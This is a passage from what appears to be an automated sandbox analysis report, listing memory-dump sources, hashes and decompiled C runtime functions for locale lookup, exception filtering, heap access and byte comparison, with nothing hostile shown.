                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadTerminateThread
                                        • String ID:
                                        • API String ID: 3842210937-0
                                        • Opcode ID: 7e6d59f41dd1dff6e9c97aa09afc93795338b72e33108df8e73b414ce0022573
                                        • Instruction ID: 64fa57fc59c32dd401c23dc3d1697a6563f817da3f37265da24063a7fccad709
                                        • Opcode Fuzzy Hash: 7e6d59f41dd1dff6e9c97aa09afc93795338b72e33108df8e73b414ce0022573
                                        • Instruction Fuzzy Hash: A5C16D71D0021AAFEF11DFA8CD44FEDBBB9BF08304F148169E6A4B6190D774A945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
                                        				short _t13;
                                        				short _t28;
                                        
                                        				_t28 = _a4;
                                        				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
                                        					if(E0106DB06(_t28, ?str?) != 0) {
                                        						return E0106FA26(_t28);
                                        					}
                                        					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                        						L9:
                                        						return 0;
                                        					}
                                        					return _a4;
                                        				}
                                        				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                        					goto L9;
                                        				}
                                        				_t13 = _a4;
                                        				if(_t13 == 0) {
                                        					return GetACP();
                                        				}
                                        				return _t13;
                                        			}






                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E010630E7(struct _EXCEPTION_POINTERS* _a4) {
                                        
                                        				SetUnhandledExceptionFilter(0);
                                        				return UnhandledExceptionFilter(_a4);
                                        			}




                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0106407B,?,?,?,00000000), ref: 010630EC
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 010630F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 90dac942dfe32f188f806272c1a99005253e138c1bd72a77f1ba84d835a96240
                                        • Instruction ID: 9b445732465233bcead1b2e0da92d74c14f405b87329d727f6696c516b402c74
                                        • Opcode Fuzzy Hash: 90dac942dfe32f188f806272c1a99005253e138c1bd72a77f1ba84d835a96240
                                        • Instruction Fuzzy Hash: AAB09231844209EBCAA22B91E80EB883F28EB04662F01C012F74D64054AB7754508BE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
                                        • Instruction ID: 20e333f8e00382b701da1c72a89869598497ffa6709d0dd5a8f2e5b35bc93b47
                                        • Opcode Fuzzy Hash: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
                                        • Instruction Fuzzy Hash: E8022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                        • Instruction ID: 07c5dfced5b4db167729cffbadfc537b9c4f888f9dced34af1aa62f749b3b5ce
                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                        • Instruction Fuzzy Hash: E8022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0106771D(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				signed int _t5;
                                        				signed int _t6;
                                        				int _t8;
                                        
                                        				_t5 =  *0x10c1af8; // 0x7c098ad9
                                        				_t6 = _t5 ^  *0x107ece0;
                                        				if(_t6 == 0) {
                                        					 *0x10c071c = _a4;
                                        					_t8 = EnumSystemLocalesW(E01067709, 1);
                                        					 *0x10c071c =  *0x10c071c & 0x00000000;
                                        					return _t8;
                                        				} else {
                                        					return  *_t6(_a4, _a8, _a12, 0);
                                        				}
                                        			}







                                        APIs
                                        • EnumSystemLocalesW.KERNEL32(01067709,00000001,?,0106DCD2,0106DD70,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0106774B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: 02642ee0af8d2194d9e80fe7cf7c2612d0b52ab69b81bed0aa5c708164a802ff
                                        • Instruction ID: 08fa725976e8c9b7c7e836c7f35d38734c3431e7895eef128108ade3208f0ee2
                                        • Opcode Fuzzy Hash: 02642ee0af8d2194d9e80fe7cf7c2612d0b52ab69b81bed0aa5c708164a802ff
                                        • Instruction Fuzzy Hash: EAE04636550308EFEF228FE5EC86B583BA8FB04714F008001F68C6A488C2BAA1619F84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,01064744,?,?,?,00000002), ref: 010677CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E010630B6(_Unknown_base(*)()* _a4) {
                                        
                                        				return SetUnhandledExceptionFilter(_a4);
                                        			}




                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,010612D0,01061285), ref: 010630BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3r+
                                        • API String ID: 0-2693420309
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E01061DB2() {
                                        				void* _t3;
                                        
                                        				_t3 = GetProcessHeap();
                                        				 *0x10bfd1c = _t3;
                                        				return 0 | _t3 != 0x00000000;
                                        			}





                                        APIs
                                        • GetProcessHeap.KERNEL32(0106111B,0107CCC0,00000014), ref: 01061DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106B933(void* __edx, void* __esi) {
                                        				signed int _t192;
                                        				signed char _t193;
                                        				signed char _t194;
                                        				signed char _t195;
                                        				signed char _t196;
                                        				signed char _t198;
                                        				signed int _t241;
                                        				void* _t287;
                                        				void* _t292;
                                        				void* _t294;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t304;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        				void* _t312;
                                        				void* _t314;
                                        				void* _t316;
                                        				void* _t318;
                                        				void* _t320;
                                        				void* _t322;
                                        				void* _t324;
                                        				void* _t326;
                                        				void* _t327;
                                        
                                        				_t327 = __esi;
                                        				_t287 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                        					_t241 = 0;
                                        					L15:
                                        					if(_t241 != 0) {
                                        						goto L2;
                                        					}
                                        					_t193 =  *(_t327 - 0x1a);
                                        					if(_t193 ==  *(_t287 - 0x1a)) {
                                        						_t241 = 0;
                                        						L26:
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						_t194 =  *(_t327 - 0x16);
                                        						if(_t194 ==  *(_t287 - 0x16)) {
                                        							_t241 = 0;
                                        							L37:
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							_t195 =  *(_t327 - 0x12);
                                        							if(_t195 ==  *(_t287 - 0x12)) {
                                        								_t241 = 0;
                                        								L48:
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								_t196 =  *(_t327 - 0xe);
                                        								if(_t196 ==  *(_t287 - 0xe)) {
                                        									_t241 = 0;
                                        									L59:
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                        										_t241 = 0;
                                        										L70:
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										_t198 =  *(_t327 - 6);
                                        										if(_t198 ==  *(_t287 - 6)) {
                                        											_t241 = 0;
                                        											L81:
                                        											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                        											}
                                        											goto L2;
                                        										}
                                        										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                        										if(_t292 == 0) {
                                        											L74:
                                        											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                        											if(_t294 == 0) {
                                        												L76:
                                        												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                        												if(_t296 == 0) {
                                        													L78:
                                        													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                        													if(_t241 != 0) {
                                        														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L81;
                                        												}
                                        												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                        												if(_t241 != 0) {
                                        													goto L2;
                                        												}
                                        												goto L78;
                                        											}
                                        											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                        											if(_t241 != 0) {
                                        												goto L2;
                                        											}
                                        											goto L76;
                                        										}
                                        										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L74;
                                        									}
                                        									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                        									if(_t298 == 0) {
                                        										L63:
                                        										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                        										if(_t300 == 0) {
                                        											L65:
                                        											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                        											if(_t302 == 0) {
                                        												L67:
                                        												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                        												if(_t241 != 0) {
                                        													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L70;
                                        											}
                                        											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                        											if(_t241 != 0) {
                                        												goto L2;
                                        											}
                                        											goto L67;
                                        										}
                                        										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L65;
                                        									}
                                        									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L63;
                                        								}
                                        								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                        								if(_t304 == 0) {
                                        									L52:
                                        									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                        									if(_t306 == 0) {
                                        										L54:
                                        										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                        										if(_t308 == 0) {
                                        											L56:
                                        											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                        											if(_t241 != 0) {
                                        												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L59;
                                        										}
                                        										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L56;
                                        									}
                                        									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L54;
                                        								}
                                        								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L52;
                                        							}
                                        							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                        							if(_t310 == 0) {
                                        								L41:
                                        								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                        								if(_t312 == 0) {
                                        									L43:
                                        									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                        									if(_t314 == 0) {
                                        										L45:
                                        										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                        										if(_t241 != 0) {
                                        											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L48;
                                        									}
                                        									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L45;
                                        								}
                                        								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L43;
                                        							}
                                        							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L41;
                                        						}
                                        						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                        						if(_t316 == 0) {
                                        							L30:
                                        							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                        							if(_t318 == 0) {
                                        								L32:
                                        								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                        								if(_t320 == 0) {
                                        									L34:
                                        									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                        									if(_t241 != 0) {
                                        										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L37;
                                        								}
                                        								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L34;
                                        							}
                                        							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L32;
                                        						}
                                        						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						goto L30;
                                        					}
                                        					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                        					if(_t322 == 0) {
                                        						L19:
                                        						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                        						if(_t324 == 0) {
                                        							L21:
                                        							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                        							if(_t326 == 0) {
                                        								L23:
                                        								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                        								if(_t241 != 0) {
                                        									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L26;
                                        							}
                                        							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L23;
                                        						}
                                        						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						goto L21;
                                        					}
                                        					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                        					if(_t241 != 0) {
                                        						goto L2;
                                        					}
                                        					goto L19;
                                        				} else {
                                        					__edi = __al & 0x000000ff;
                                        					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L8:
                                        						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L10:
                                        							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L12:
                                        								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L15;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								L2:
                                        								_t192 = _t241;
                                        								return _t192;
                                        							}
                                        							goto L12;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L2;
                                        						}
                                        						goto L10;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L2;
                                        					}
                                        					goto L8;
                                        				}
                                        			}































                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: 8f497d623201cdbb83a7236413e20052a56ac83402389db93955ff8c36b34b9a
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 2AC164B23051930AEFAE463E857443FBEE95A916B131A179DD8F3CB1D6FE20C124C620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106BD68(void* __edx, void* __esi) {
                                        				signed int _t197;
                                        				signed char _t198;
                                        				signed char _t199;
                                        				signed char _t200;
                                        				signed char _t202;
                                        				signed char _t203;
                                        				signed int _t246;
                                        				void* _t294;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t309;
                                        				void* _t311;
                                        				void* _t313;
                                        				void* _t315;
                                        				void* _t317;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t323;
                                        				void* _t325;
                                        				void* _t327;
                                        				void* _t329;
                                        				void* _t331;
                                        				void* _t333;
                                        				void* _t335;
                                        				void* _t336;
                                        
                                        				_t336 = __esi;
                                        				_t294 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                        					_t246 = 0;
                                        					L14:
                                        					if(_t246 != 0) {
                                        						goto L1;
                                        					}
                                        					_t198 =  *(_t336 - 0x1b);
                                        					if(_t198 ==  *(_t294 - 0x1b)) {
                                        						_t246 = 0;
                                        						L25:
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						_t199 =  *(_t336 - 0x17);
                                        						if(_t199 ==  *(_t294 - 0x17)) {
                                        							_t246 = 0;
                                        							L36:
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							_t200 =  *(_t336 - 0x13);
                                        							if(_t200 ==  *(_t294 - 0x13)) {
                                        								_t246 = 0;
                                        								L47:
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                        									_t246 = 0;
                                        									L58:
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									_t202 =  *(_t336 - 0xb);
                                        									if(_t202 ==  *(_t294 - 0xb)) {
                                        										_t246 = 0;
                                        										L69:
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										_t203 =  *(_t336 - 7);
                                        										if(_t203 ==  *(_t294 - 7)) {
                                        											_t246 = 0;
                                        											L80:
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
